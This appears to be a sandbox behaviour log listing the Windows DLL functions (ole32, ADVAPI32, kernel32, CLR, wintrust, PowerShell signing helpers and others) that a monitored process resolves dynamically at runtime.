                    
                        
DynamicLoader: CRYPTBASE.dll/SystemFunction036

                    
                
                    
                        
DynamicLoader: uxtheme.dll/ThemeInitApiHook

                    
                
                    
                        
DynamicLoader: USER32.dll/IsProcessDPIAware

                    
                
                    
                        
DynamicLoader: ole32.dll/CoCreateInstance

                    
                
                    
                        
DynamicLoader: shell32.dll/

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetApartmentType

                    
                
                    
                        
DynamicLoader: ole32.dll/CoRegisterInitializeSpy

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemFree

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemAlloc

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetMalloc

                    
                
                    
                        
DynamicLoader: ole32.dll/CoInitializeEx

                    
                
                    
                        
DynamicLoader: ole32.dll/CreateBindCtx

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemAlloc

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegEnumKeyW

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW

                    
                
                    
                        
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW

                    
                
                    
                        
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/IsTextUnicode

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: shell32.dll/

                    
                
                    
                        
DynamicLoader: ole32.dll/CoUninitialize

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetMalloc

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemFree

                    
                
                    
                        
DynamicLoader: apphelp.dll/ApphelpCheckShellObject

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress

                    
                
                    
                        
DynamicLoader: LINKINFO.dll/IsValidLinkInfo

                    
                
                    
                        
DynamicLoader: propsys.dll/

                    
                
                    
                        
DynamicLoader: propsys.dll/PSGetNameFromPropertyKey

                    
                
                    
                        
DynamicLoader: propsys.dll/PSStringFromPropertyKey

                    
                
                    
                        
DynamicLoader: propsys.dll/InitVariantFromBuffer

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: propsys.dll/PropVariantToGUID

                    
                
                    
                        
DynamicLoader: ole32.dll/PropVariantClear

                    
                
                    
                        
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore

                    
                
                    
                        
DynamicLoader: sechost.dll/ConvertSidToStringSidW

                    
                
                    
                        
DynamicLoader: profapi.dll/

                    
                
                    
                        
DynamicLoader: LINKINFO.dll/CreateLinkInfoW

                    
                
                    
                        
DynamicLoader: USER32.dll/IsCharAlphaW

                    
                
                    
                        
DynamicLoader: USER32.dll/CharPrevW

                    
                
                    
                        
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW

                    
                
                    
                        
DynamicLoader: srvcli.dll/NetShareEnum

                    
                
                    
                        
DynamicLoader: cscapi.dll/CscNetApiGetInterface

                    
                
                    
                        
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD

                    
                
                    
                        
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW

                    
                
                    
                        
DynamicLoader: LINKINFO.dll/DestroyLinkInfo

                    
                
                    
                        
DynamicLoader: propsys.dll/PropVariantToBoolean

                    
                
                    
                        
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW

                    
                
                    
                        
DynamicLoader: CRYPTSP.dll/CryptGenRandom

                    
                
                    
                        
DynamicLoader: CRYPTSP.dll/CryptReleaseContext

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/GetSecurityInfo

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/SetSecurityInfo

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/GetSecurityDescriptorControl

                    
                
                    
                        
DynamicLoader: ole32.dll/CoRevokeInitializeSpy

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegEnumValueW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegCloseKey

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegQueryValueExW

                    
                
                    
                        
DynamicLoader: mscoreei.dll/RegisterShimImplCallback

                    
                
                    
                        
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback

                    
                
                    
                        
DynamicLoader: mscoreei.dll/SetShellShimInstance

                    
                
                    
                        
DynamicLoader: mscoreei.dll/OnShimDllMainCalled

                    
                
                    
                        
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr

                    
                
                    
                        
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx

                    
                
                    
                        
DynamicLoader: SHLWAPI.dll/UrlIsW

                    
                
                    
                        
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW

                    
                
                    
                        
DynamicLoader: VERSION.dll/GetFileVersionInfoW

                    
                
                    
                        
DynamicLoader: VERSION.dll/VerQueryValueW

                    
                
                    
                        
DynamicLoader: clr.dll/SetRuntimeInfo

                    
                
                    
                        
DynamicLoader: USER32.dll/GetProcessWindowStation

                    
                
                    
                        
DynamicLoader: USER32.dll/GetUserObjectInformationW

                    
                
                    
                        
DynamicLoader: clr.dll/DllGetClassObjectInternal

                    
                
                    
                        
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive

                    
                
                    
                        
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive

                    
                
                    
                        
DynamicLoader: kernel32.dll/AddDllDirectory

                    
                
                    
                        
DynamicLoader: mscoree.dll/CreateConfigStream

                    
                
                    
                        
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr

                    
                
                    
                        
DynamicLoader: mscoreei.dll/CreateConfigStream

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetNumaHighestNodeNumber

                    
                
                    
                        
DynamicLoader: kernel32.dll/FlsSetValue

                    
                
                    
                        
DynamicLoader: kernel32.dll/FlsGetValue

                    
                
                    
                        
DynamicLoader: kernel32.dll/FlsAlloc

                    
                
                    
                        
DynamicLoader: kernel32.dll/FlsFree

                    
                
                    
                        
DynamicLoader: ntdll.dll/RtlVirtualUnwind

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/OpenProcessToken

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/GetTokenInformation

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/InitializeAcl

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/FreeSid

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/OpenProcessToken

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/GetTokenInformation

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/InitializeAcl

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/FreeSid

                    
                
                    
                        
DynamicLoader: kernel32.dll/AddSIDToBoundaryDescriptor

                    
                
                    
                        
DynamicLoader: kernel32.dll/CreateBoundaryDescriptorW

                    
                
                    
                        
DynamicLoader: kernel32.dll/CreatePrivateNamespaceW

                    
                
                    
                        
DynamicLoader: kernel32.dll/OpenPrivateNamespaceW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/OpenProcessToken

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/GetTokenInformation

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/InitializeAcl

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/FreeSid

                    
                
                    
                        
DynamicLoader: kernel32.dll/DeleteBoundaryDescriptor

                    
                
                    
                        
DynamicLoader: kernel32.dll/WerRegisterRuntimeExceptionModule

                    
                
                    
                        
DynamicLoader: kernel32.dll/RaiseException

                    
                
                    
                        
DynamicLoader: mscoree.dll/

                    
                
                    
                        
DynamicLoader: mscoreei.dll/

                    
                
                    
                        
DynamicLoader: kernel32.dll/AddDllDirectory

                    
                
                    
                        
DynamicLoader: kernel32.dll/FlsGetValue

                    
                
                    
                        
DynamicLoader: ole32.dll/CoInitializeEx

                    
                
                    
                        
DynamicLoader: mscoree.dll/GetProcessExecutableHeap

                    
                
                    
                        
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr

                    
                
                    
                        
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetContextToken

                    
                
                    
                        
DynamicLoader: KERNELBASE.dll/SetSystemFileCacheSize

                    
                
                    
                        
DynamicLoader: ntdll.dll/NtSetSystemInformation

                    
                
                    
                        
DynamicLoader: KERNELBASE.dll/PrivIsDllSynchronizationHeld

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/SysStringByteLen

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetLocaleInfoEx

                    
                
                    
                        
DynamicLoader: kernel32.dll/LocaleNameToLCID

                    
                
                    
                        
DynamicLoader: CRYPTSP.dll/CryptHashData

                    
                
                    
                        
DynamicLoader: CRYPTSP.dll/CryptGetHashParam

                    
                
                    
                        
DynamicLoader: CRYPTSP.dll/CryptDestroyHash

                    
                
                    
                        
DynamicLoader: CRYPTSP.dll/CryptDestroyKey

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/EventRegister

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/EventSetInformation

                    
                
                    
                        
DynamicLoader: ntdll.dll/NtQueryInformationThread

                    
                
                    
                        
DynamicLoader: ntdll.dll/NtQuerySystemInformation

                    
                
                    
                        
DynamicLoader: kernel32.dll/CreateWaitableTimerExW

                    
                
                    
                        
DynamicLoader: kernel32.dll/SetWaitableTimerEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/EventActivityIdControl

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/EventRegister

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/EventWriteTransfer

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegCloseKey

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW

                    
                
                    
                        
DynamicLoader: kernel32.dll/LocalFree

                    
                
                    
                        
DynamicLoader: kernel32.dll/LocalAlloc

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetFullPathNameW

                    
                
                    
                        
DynamicLoader: kernel32.dll/SetThreadErrorMode

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetFileAttributesEx

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetFileAttributesExW

                    
                
                    
                        
DynamicLoader: VERSION.dll/GetFileVersionInfoSize

                    
                
                    
                        
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW

                    
                
                    
                        
DynamicLoader: ole32.dll/CoUninitialize

                    
                
                    
                        
DynamicLoader: VERSION.dll/GetFileVersionInfo

                    
                
                    
                        
DynamicLoader: VERSION.dll/GetFileVersionInfoW

                    
                
                    
                        
DynamicLoader: VERSION.dll/VerQueryValue

                    
                
                    
                        
DynamicLoader: VERSION.dll/VerQueryValueW

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName

                    
                
                    
                        
DynamicLoader: kernel32.dll/LCIDToLocaleName

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetUserPreferredUILanguages

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages

                    
                
                    
                        
DynamicLoader: nlssorting.dll/SortGetHandle

                    
                
                    
                        
DynamicLoader: nlssorting.dll/SortCloseHandle

                    
                
                    
                        
DynamicLoader: nlssorting.dll/SortGetHandle

                    
                
                    
                        
DynamicLoader: nlssorting.dll/SortCloseHandle

                    
                
                    
                        
DynamicLoader: kernel32.dll/ResolveLocaleName

                    
                
                    
                        
DynamicLoader: kernel32.dll/CompareStringOrdinal

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetFullPathName

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetFullPathNameW

                    
                
                    
                        
DynamicLoader: kernel32.dll/LCMapStringEx

                    
                
                    
                        
DynamicLoader: VERSION.dll/VerLanguageName

                    
                
                    
                        
DynamicLoader: VERSION.dll/VerLanguageNameW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegQueryValueEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegQueryValueExW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegQueryValueEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegQueryValueExW

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetCurrentProcessId

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetCurrentProcessIdW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetCurrentProcess

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/OpenProcessToken

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW

                    
                
                    
                        
DynamicLoader: kernel32.dll/CloseHandle

                    
                
                    
                        
DynamicLoader: kernel32.dll/OpenProcess

                    
                
                    
                        
DynamicLoader: kernel32.dll/OpenProcessW

                    
                
                    
                        
DynamicLoader: psapi.dll/EnumProcessModules

                    
                
                    
                        
DynamicLoader: psapi.dll/EnumProcessModulesW

                    
                
                    
                        
DynamicLoader: psapi.dll/GetModuleInformation

                    
                
                    
                        
DynamicLoader: psapi.dll/GetModuleInformationW

                    
                
                    
                        
DynamicLoader: psapi.dll/GetModuleBaseName

                    
                
                    
                        
DynamicLoader: psapi.dll/GetModuleBaseNameW

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemAlloc

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemFree

                    
                
                    
                        
DynamicLoader: psapi.dll/GetModuleFileNameEx

                    
                
                    
                        
DynamicLoader: psapi.dll/GetModuleFileNameExW

                    
                
                    
                        
DynamicLoader: shell32.dll/SHGetFolderPath

                    
                
                    
                        
DynamicLoader: shell32.dll/SHGetFolderPathW

                    
                
                    
                        
DynamicLoader: kernel32.dll/CreateFile

                    
                
                    
                        
DynamicLoader: kernel32.dll/CreateFileW

                    
                
                    
                        
DynamicLoader: kernel32.dll/CloseHandle

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetFileType

                    
                
                    
                        
DynamicLoader: wintrust.dll/WTGetSignatureInfo

                    
                
                    
                        
DynamicLoader: wintrust.dll/WTGetSignatureInfoA

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemAlloc

                    
                
                    
                        
DynamicLoader: wintrust.dll/WinVerifyTrust

                    
                
                    
                        
DynamicLoader: wintrust.dll/WinVerifyTrustW

                    
                
                    
                        
DynamicLoader: wintrust.dll/WintrustCertificateTrust

                    
                
                    
                        
DynamicLoader: wintrust.dll/SoftpubAuthenticode

                    
                
                    
                        
DynamicLoader: wintrust.dll/SoftpubInitialize

                    
                
                    
                        
DynamicLoader: wintrust.dll/SoftpubLoadMessage

                    
                
                    
                        
DynamicLoader: wintrust.dll/SoftpubLoadSignature

                    
                
                    
                        
DynamicLoader: wintrust.dll/SoftpubCheckCert

                    
                
                    
                        
DynamicLoader: wintrust.dll/SoftpubCleanup

                    
                
                    
                        
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA

                    
                
                    
                        
DynamicLoader: psapi.dll/EnumProcessModules

                    
                
                    
                        
DynamicLoader: psapi.dll/EnumProcessModulesW

                    
                
                    
                        
DynamicLoader: MSISIP.DLL/DllCanUnloadNow

                    
                
                    
                        
DynamicLoader: MSISIP.DLL/MsiSIPIsMyTypeOfFile

                    
                
                    
                        
DynamicLoader: ole32.dll/CoInitialize

                    
                
                    
                        
DynamicLoader: ole32.dll/StgOpenStorage

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetExitCodeProcess

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetExitCodeProcessW

                    
                
                    
                        
DynamicLoader: USER32.dll/EnumWindows

                    
                
                    
                        
DynamicLoader: USER32.dll/EnumWindowsW

                    
                
                    
                        
DynamicLoader: USER32.dll/GetWindowThreadProcessId

                    
                
                    
                        
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW

                    
                
                    
                        
DynamicLoader: USER32.dll/GetWindow

                    
                
                    
                        
DynamicLoader: USER32.dll/IsWindowVisible

                    
                
                    
                        
DynamicLoader: USER32.dll/IsWindowVisibleW

                    
                
                    
                        
DynamicLoader: ntdll.dll/NtQuerySystemInformation

                    
                
                    
                        
DynamicLoader: ntdll.dll/NtQuerySystemInformationW

                    
                
                    
                        
DynamicLoader: kernel32.dll/WerSetFlags

                    
                
                    
                        
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages

                    
                
                    
                        
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW

                    
                
                    
                        
DynamicLoader: wshext.dll/DllCanUnloadNow

                    
                
                    
                        
DynamicLoader: wshext.dll/IsFileSupportedName

                    
                
                    
                        
DynamicLoader: pwrshsip.dll/DllCanUnloadNow

                    
                
                    
                        
DynamicLoader: pwrshsip.dll/PsIsMyFileType

                    
                
                    
                        
DynamicLoader: pwrshsip.dll/PsPutSignature

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW

                    
                
                    
                        
DynamicLoader: pwrshsip.dll/PsGetSignature

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetEnvironmentVariable

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetEnvironmentVariableW

                    
                
                    
                        
DynamicLoader: wintrust.dll/WTHelperProvDataFromStateData

                    
                
                    
                        
DynamicLoader: wintrust.dll/WTHelperProvDataFromStateDataW

                    
                
                    
                        
DynamicLoader: wintrust.dll/WTHelperGetProvSignerFromChain

                    
                
                    
                        
DynamicLoader: wintrust.dll/WTHelperGetProvSignerFromChainW

                    
                
                    
                        
DynamicLoader: ole32.dll/CoCreateGuid

                    
                
                    
                        
DynamicLoader: CRYPTSP.dll/CryptReleaseContext

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemFree

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegEnumValue

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegEnumValueW

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetConsoleCP

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetConsoleCPW

                    
                
                    
                        
DynamicLoader: kernel32.dll/CreateFile

                    
                
                    
                        
DynamicLoader: kernel32.dll/CreateFileW

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetCurrentConsoleFontEx

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetCurrentConsoleFontExW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegQueryValueEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegQueryValueExW

                    
                
                    
                        
DynamicLoader: ntdll.dll/NtQuerySystemInformation

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetTimeZoneInformation

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW

                    
                
                    
                        
DynamicLoader: shell32.dll/SHGetFolderPathW

                    
                
                    
                        
DynamicLoader: bcrypt.dll/BCryptGetFipsAlgorithmMode

                    
                
                    
                        
DynamicLoader: CRYPTSP.dll/CryptGetDefaultProviderW

                    
                
                    
                        
DynamicLoader: CRYPTSP.dll/CryptGenRandom

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetComputerName

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetComputerNameW

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetConsoleMode

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetConsoleModeW

                    
                
                    
                        
DynamicLoader: kernel32.dll/SetConsoleMode

                    
                
                    
                        
DynamicLoader: kernel32.dll/SetConsoleModeW

                    
                
                    
                        
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler

                    
                
                    
                        
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetStdHandle

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetConsoleMode

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetCurrentProcess

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetCurrentProcessW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/OpenProcessToken

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/GetTokenInformation

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/GetTokenInformationW

                    
                
                    
                        
DynamicLoader: kernel32.dll/LocalAlloc

                    
                
                    
                        
DynamicLoader: kernel32.dll/LocalAllocW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/CheckTokenMembership

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetConsoleTitle

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetConsoleTitleW

                    
                
                    
                        
DynamicLoader: kernel32.dll/SetConsoleTitle

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetConsoleWindow

                    
                
                    
                        
DynamicLoader: USER32.dll/ShowWindow

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetProcessTimes

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetProcessTimesW

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetDynamicTimeZoneInformation

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetFileMUIPath

                    
                
                    
                        
DynamicLoader: kernel32.dll/LoadLibraryEx

                    
                
                    
                        
DynamicLoader: kernel32.dll/LoadLibraryExW

                    
                
                    
                        
DynamicLoader: kernel32.dll/FreeLibrary

                    
                
                    
                        
DynamicLoader: kernel32.dll/FreeLibraryW

                    
                
                    
                        
DynamicLoader: USER32.dll/LoadStringW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/CreateWellKnownSid

                    
                
                    
                        
DynamicLoader: kernel32.dll/CreateNamedPipe

                    
                
                    
                        
DynamicLoader: kernel32.dll/CreateNamedPipeW

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetFileType

                    
                
                    
                        
DynamicLoader: kernel32.dll/SetEnvironmentVariable

                    
                
                    
                        
DynamicLoader: kernel32.dll/SetEnvironmentVariableW

                    
                
                    
                        
DynamicLoader: kernel32.dll/CreateEvent

                    
                
                    
                        
DynamicLoader: kernel32.dll/CreateEventW

                    
                
                    
                        
DynamicLoader: kernel32.dll/ConnectNamedPipe

                    
                
                    
                        
DynamicLoader: mscoree.dll/GetTokenForVTableEntry

                    
                
                    
                        
DynamicLoader: mscoree.dll/SetTargetForVTableEntry

                    
                
                    
                        
DynamicLoader: mscoree.dll/GetTargetForVTableEntry

                    
                
                    
                        
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr

                    
                
                    
                        
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry

                    
                
                    
                        
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr

                    
                
                    
                        
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry

                    
                
                    
                        
DynamicLoader: ole32.dll/CoCreateGuid

                    
                
                    
                        
DynamicLoader: api-ms-win-core-xstate-l2-1-0.dll/GetEnabledXStateFeatures

                    
                
                    
                        
DynamicLoader: clrjit.dll/sxsJitStartup

                    
                
                    
                        
DynamicLoader: clrjit.dll/jitStartup

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/EventSetInformation

                    
                
                    
                        
DynamicLoader: clrjit.dll/getJit

                    
                
                    
                        
DynamicLoader: CRYPTSP.dll/CryptReleaseContext

                    
                
                    
                        
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings

                    
                
                    
                        
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW

                    
                
                    
                        
DynamicLoader: secur32.dll/GetUserNameEx

                    
                
                    
                        
DynamicLoader: secur32.dll/GetUserNameExW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/GetUserName

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/GetUserNameW

                    
                
                    
                        
DynamicLoader: kernel32.dll/EnumCalendarInfoExEx

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetCalendarInfoEx

                    
                
                    
                        
DynamicLoader: kernel32.dll/EnumSystemLocalesEx

                    
                
                    
                        
DynamicLoader: kernel32.dll/EnumTimeFormatsEx

                    
                
                    
                        
DynamicLoader: kernel32.dll/ReleaseMutex

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegisterEventSource

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/DeregisterEventSource

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/ReportEvent

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/ReportEventW

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetLogicalDrives

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetDriveType

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetDriveTypeW

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetVolumeInformation

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetVolumeInformationW

                    
                
                    
                        
DynamicLoader: SHLWAPI.dll/PathIsNetworkPath

                    
                
                    
                        
DynamicLoader: SHLWAPI.dll/PathIsNetworkPathW

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetFileAttributes

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetFileAttributesW

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetCurrentDirectoryW

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetSystemDirectory

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetSystemDirectoryW

                    
                
                    
                        
DynamicLoader: ntdll.dll/NtQuerySystemInformation

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetTempPath

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetTempPathW

                    
                
                    
                        
DynamicLoader: kernel32.dll/WriteFile

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/SaferIdentifyLevel

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/SaferComputeTokenFromLevel

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/SaferCloseLevel

                    
                
                    
                        
DynamicLoader: kernel32.dll/DeleteFile

                    
                
                    
                        
DynamicLoader: kernel32.dll/DeleteFileW

                    
                
                    
                        
